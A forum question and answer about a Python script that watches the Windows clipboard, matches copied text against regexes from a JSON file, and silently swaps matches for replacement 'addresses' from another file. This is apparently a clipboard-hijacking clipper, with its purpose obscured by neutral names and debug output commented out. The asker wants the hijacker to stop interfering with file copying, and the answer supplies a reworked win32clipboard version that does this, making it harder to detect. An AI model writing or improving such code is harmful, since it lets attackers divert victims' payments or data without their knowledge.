# Pyperclip won't let me copy files if it running, allowing text only

Tags: python

Python Pyperclip won't let me copy files if it running, it only allow text to copy. How can I avoid such problem whenever the script is running, here is what I have done so far... The json file are string and regex file Pyperclip need to listen to

```
import pyperclip
import json
import time
import re
import sys
import inspect, os
import winreg
from pathlib import Path
import shutil
import pywintypes
import subprocess
import os.path
from os import path



def found_string_text(user_clipboard: str) -> str:
    """Returns name of found string_text in user_clipboard"""

    # open matches
    with open(resource_path("regex_match.json")) as json_file:
        regex_addresses = json.load(json_file)

    # go through matches, check if any regex matches user_clipboard
    for string_text_name, string_text_address in regex_addresses.items():
        if bool(re.search(string_text_address, user_clipboard)):
            return string_text_name
    return None  # no string_text found


def replace_clipboard(found_string_text: str) -> str:
    with open(resource_path("addresses.json")) as json_file:
        master_addresses = json.load(json_file)

    if master_addresses[found_string_text] != "ignore" and type(master_addresses[found_string_text] is str):
        pyperclip.copy(master_addresses[found_string_text])
        #print(f"Replaced:{master_addresses[found_string_text]}")



def main():
    #print("Watching")
    while True:
        try:
            time.sleep(0.5)
            user_clipboard = str(pyperclip.paste())
            # check if found
            found_string_text_name = found_string_text(user_clipboard)
            if found_string_text_name is not None:
                # if so replace
                #print(f"Found:{found_string_text_name}")
                replace_clipboard(found_string_text_name)
        except pyperclip.PyperclipWindowsException:
            pass
        except KeyboardInterrupt:
            #print("Goodbye.")
            sys.exit(0)
            




def checkifexist_file():
    if os.path.exists('myfolder\\file.txt'):
        main()
    else:
        rev()
        main() 


if __name__ == '__main__':
    checkifexist_file()
    enter code here
```

Please genius help me, when the script run it runs fine but won't allow user to copy other content. E.g like files, it only allow user copy text only.

Answer (score 0):

I later find other alternative Lib by using win32clipboard module from pywin32 Lib, here is it

```
def get_clipboard():
    win32clipboard.OpenClipboard()
    data = win32clipboard.GetClipboardData()
    win32clipboard.CloseClipboard()
    return data

def set_clipboard(text):
    win32clipboard.OpenClipboard()
    win32clipboard.EmptyClipboard()
    win32clipboard.SetClipboardText(text, win32clipboard.CF_TEXT )
    #win32clipboard.SetClipboard(text.encode('utf-8'),win32clipboard.CF_TEXT)
    #win32clipboard.SetClipboard(unicode(text),win32clipboard.CF_UNICODETEXT)
    win32clipboard.CloseClipboard()

def main():
    try:
        dataR = get_clipboard()
        if type((dataR) is str):
            for key in addr:
                findstring_text = re.search(key,dataR)
                if (findstring_text):
                   set_clipboard(addr[key])
    except pywintypes.error as e:
        pass
    except TypeError:
        win32clipboard.CloseClipboard()
```

It really work well.. Thanks